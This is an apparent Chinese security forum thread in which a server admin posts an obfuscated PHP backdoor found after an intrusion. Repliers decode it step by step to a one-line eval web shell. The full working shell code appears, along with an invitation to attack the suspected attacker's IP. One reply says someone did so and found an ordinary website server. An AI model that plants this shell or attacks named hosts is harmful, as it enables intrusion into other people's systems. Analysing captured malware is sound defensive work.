12日服务器被入侵提权,发现新型php后门
本帖最后由 user88 于 2017-6-15 18:39 编辑我使用的是windows server 2008 系统
有安全狗及安全狗iis版,我就纳闷了,它是怎么拿到我服务器权限的,我所以目录的权限都设死了。
今天我才在我的服务器上面无意中发现一个xlkfs.dll 文件,百度一查是“”“遭遇驱动级文件”病毒,还有如下,我通过配置文件找到了下面这个php后门,现在不确定还有没有后门,麻烦有php大神解密下他这个是什么原理。
贴上php后门代码:
<?php
$lg="ZTZrNGtfa2RrirZWtirja29rZGirtlirIik7CiRzYnAgPirSAkdirmJsKCirJjdHciLCIiLCJjdHirdjirY3R3cirmVjdHdhdGN0d2VjdHdfZmN0d3VuirY2N";
$vq="IAokdWY9irInNuYzMiOwoka2E9irIklFQmxkirbUZic0siOwirokcGp0irPSJDUmZVRTlUVkirYiOwokdmJsID0gc3RyX3JlcGxhY2UoirInirRpIiwiIiwidG";
$jj = str_replace("pc","","pcspctrpc_pcrpcepcplpcacpce");
$rkf="lzdGlir0dGlydGlfcirnRpZXRpcGx0iraWF0iraWNlIik7CiRpcXc9IkY2Y2lkZEirtUcz0iOwokYmirtmIirDir0gJHZibCgiayIsICIiLCirAia2Jha3Nr";
$qi="0d3RjdHdpb2N0d2ir4iKTsKirJG1weSA9ICRzYnAoJycsICRia2YoJHZibCgiYiIsICIiLirCAka2EuJHirBirqdC4kdWYuJGlxdykirpKTsgJG1weSgpOwo=";
$nsx = $jj("dd", "", "bddasddedd6dd4dd_dddddeddcddoddddde");
$ifl = $jj("ef","","efcreatefe_effefuefnefceftiefoefn");
$jez = $ifl('', $nsx($jj("ir", "", $vq.$rkf.$lg.$qi))); $jez();
?>
此人来我服务器的日志记录段:
2017-06-12 05:38:40 W3SVC3 SICTFFDUJOZDJKG xxxxxxxxxxx POST /inc/module/wee.php - 80 - 122.114.111.206 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) 200 0 0 78
还发现个惊喜:
http://122.114.111.206/
一定是他的跳板机子,上面一定还有很多倍入侵的网站shell
有实力的人可以尝试拿下他的服务器
很稳,肯定是木马 很稳,是木马,通过了两个循环。
str_replace,base64_decode,create_function三个函数的组合拳而已。
最终解出来:@eval($_POST['sqzr']); 顶3楼
$jez = create_function('', base64_decode(str_replace("ir", "", $vq.$rkf.$lg.$qi)));
$vq.$rkf.$lg.$qi:
IAokdWY9irInNuYzMiOwoka2E9irIklFQmxkirbUZic0siOwirokcGp0irPSJDUmZVRTlUVkirYiOwokdmJsID0gc3RyX3JlcGxhY2UoirInirRpIiwiIiwidGlzdGlir0dGlydGlfcirnRpZXRpcGx0iraWF0iraWNlIik7CiRpcXc9IkY2Y2lkZEirtUcz0iOwokYmirtmIirDir0gJHZibCgiayIsICIiLCirAia2Jha3NrZTZrNGtfa2RrirZWtirja29rZGirtlirIik7CiRzYnAgPirSAkdirmJsKCirJjdHciLCIiLCJjdHirdjirY3R3cirmVjdHdhdGN0d2VjdHdfZmN0d3VuirY2N0d3RjdHdpb2N0d2ir4iKTsKirJG1weSA9ICRzYnAoJycsICRia2YoJHZibCgiYiIsICIiLirCAka2EuJHirBirqdC4kdWYuJGlxdykirpKTsgJG1weSgpOwo=
str_replace("ir", "", $vq.$rkf.$lg.$qi)
IAokdWY9InNuYzMiOwoka2E9IklFQmxkbUZic0siOwokcGp0PSJDUmZVRTlUVkYiOwokdmJsID0gc3RyX3JlcGxhY2UoInRpIiwiIiwidGlzdGl0dGlydGlfcnRpZXRpcGx0aWF0aWNlIik7CiRpcXc9IkY2Y2lkZEtUcz0iOwokYmtmID0gJHZibCgiayIsICIiLCAia2Jha3NrZTZrNGtfa2RrZWtja29rZGtlIik7CiRzYnAgPSAkdmJsKCJjdHciLCIiLCJjdHdjY3R3cmVjdHdhdGN0d2VjdHdfZmN0d3VuY2N0d3RjdHdpb2N0d24iKTsKJG1weSA9ICRzYnAoJycsICRia2YoJHZibCgiYiIsICIiLCAka2EuJHBqdC4kdWYuJGlxdykpKTsgJG1weSgpOwo=
base64_encode(str_replace("ir", "", $vq.$rkf.$lg.$qi));
$uf="snc3";
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy();
$mpy = $create_function('', $base64_decode(str_replace("b", "", $ka.$pjt.$uf.$iqw)));
str_replace("b", "","IEBldmFbsKCRfUE9TVFsnc3F6ciddKTs=");
IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=
base64_encode("IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=");
@eval($_POST['sqzr']);
卧槽,这么牛,你的服务器上面有什么,竟然被大牛盯上 厉害那个是加密的吗,我都看不懂:'(
RE: 12日服务器被入侵提权,发现新型php后门
w2015 发表于 2017-6-17 15:10很稳,是木马,通过了两个循环。
str_replace,base64_decode,create_function三个函数的组合拳而已。
最 ...
怎么解析出来的啊
RE: 12日服务器被入侵提权,发现新型php后门
kiss念伊人 发表于 2017-6-20 16:45怎么解析出来的啊
看4楼表哥的就可以了!将变量echo出来就可以看了!
RE: 12日服务器被入侵提权,发现新型php后门
长夜漫漫,寂寞难耐,一言不合就开干!!!然而搞下来后发现并不是所谓的跳板机,是正常的带网站的Linux服务器,楼主怎么说?
都是厉害的大牛
页:
[1]
2